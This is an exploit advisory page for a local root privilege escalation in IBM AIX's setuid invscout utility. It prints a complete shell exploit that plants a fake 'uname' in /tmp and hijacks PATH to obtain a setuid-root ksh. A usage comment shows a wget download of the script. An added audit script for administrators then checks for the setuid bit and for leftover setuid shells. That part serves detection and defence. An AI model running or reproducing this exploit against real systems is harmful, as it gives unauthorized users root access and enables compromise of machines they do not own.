IBM AIX invscout Local Exploit
Summary
Provided here is an exploit for the IBM AIX invscout Local Command Execution Vulnerability reported previously.
Credit:
The information has been provided by lord.
Details
Exploit Code:
#!/usr/bin/sh
# bash script by LorD from IHS
# Private IHS IRAN HACKERS SABOTAGE Private
# Special tnx to : My very good friend Arezoo and NT and C0d3r
# AIX invscout execute command then u can run command as root and get L0cal r00t access
# Tested on : AIX 4.X 5.1 5.2 5.3
# id
# uid=99(nobody) gid=207(nogroup) euid=0(root) egid=0(system) groups=1(other),205(admstaff),206(faculty)
# uname -a
# AIX neo1 2 5 000F7AAF4C00
# Bug found at :
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities&flashstatus=true
# www.ihsteam.com www.ihssecurity.com
# IRC.IHSteam.com #IHS
# usage cd /tmp;wget www.site.com/lord chmod +x inv ./lord
# gives euid=0(root) and guid=0(system)
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
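The script above works because invscout runs with the setuid bit and looks up uname through the caller's PATH, so a PATH that points at /tmp makes the setuid process execute the attacker's uname instead of /usr/bin/uname. The following audit script is an added example for administrators and is not part of the original advisory or of the exploit author's code. It reports whether invscout still carries the setuid bit and scans scratch directories for root-owned setuid files, which is the artifact this exploit leaves behind (a setuid-root copy of ksh in /tmp). The INVSCOUT path and the SCRATCH_DIRS list are assumptions for a typical AIX installation.

```shell
#!/bin/sh
# Added defender-side audit (not from the original advisory): looks for the two
# things this class of issue leaves visible on a host, (1) the setuid-root
# binary /usr/sbin/invscout still carrying its setuid bit, and (2) stray
# root-owned setuid files in world-writable scratch directories such as /tmp.
# INVSCOUT and SCRATCH_DIRS are assumed paths for a typical AIX box.

INVSCOUT="/usr/sbin/invscout"
SCRATCH_DIRS="/tmp /var/tmp"

# is_setuid FILE : exit 0 when FILE is a regular file with the setuid bit set.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# list_setuid DIR : print every regular file under DIR with the setuid bit,
# one path per line (empty output when there are none).
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# list_setuid_root DIR : same, restricted to root-owned files, which is the
# signature of a copied shell left behind by a privilege-escalation attempt.
list_setuid_root() {
    find "$1" -type f -user root -perm -4000 2>/dev/null
}

# audit_host : report the state of invscout and scan the scratch directories;
# returns 1 when anything suspicious was found, 0 otherwise.
audit_host() {
    rc=0
    if is_setuid "$INVSCOUT"; then
        echo "WARN: $INVSCOUT is setuid; remove the bit (chmod u-s) until a fix is applied"
        rc=1
    elif [ -f "$INVSCOUT" ]; then
        echo "OK:   $INVSCOUT present without setuid bit"
    else
        echo "INFO: $INVSCOUT not installed"
    fi
    for d in $SCRATCH_DIRS; do
        [ -d "$d" ] || continue
        found=$(list_setuid_root "$d")
        if [ -n "$found" ]; then
            echo "WARN: root-owned setuid file(s) under $d:"
            echo "$found" | sed 's/^/      /'
            rc=1
        else
            echo "OK:   no root-owned setuid files under $d"
        fi
    done
    return $rc
}

# Run the full audit only when invoked as "sh audit.sh audit", so the
# functions can also be sourced and used individually.
case "${1:-}" in
    audit) audit_host ;;
esac
```

Run it as root with `sh audit.sh audit` after applying the exploit, or on a schedule, and alert on a non-zero exit status. Removing the setuid bit from invscout breaks it for non-root users but closes the PATH-hijack path until a vendor fix is installed; a root-owned setuid shell in /tmp should be treated as an indicator of compromise rather than simply deleted.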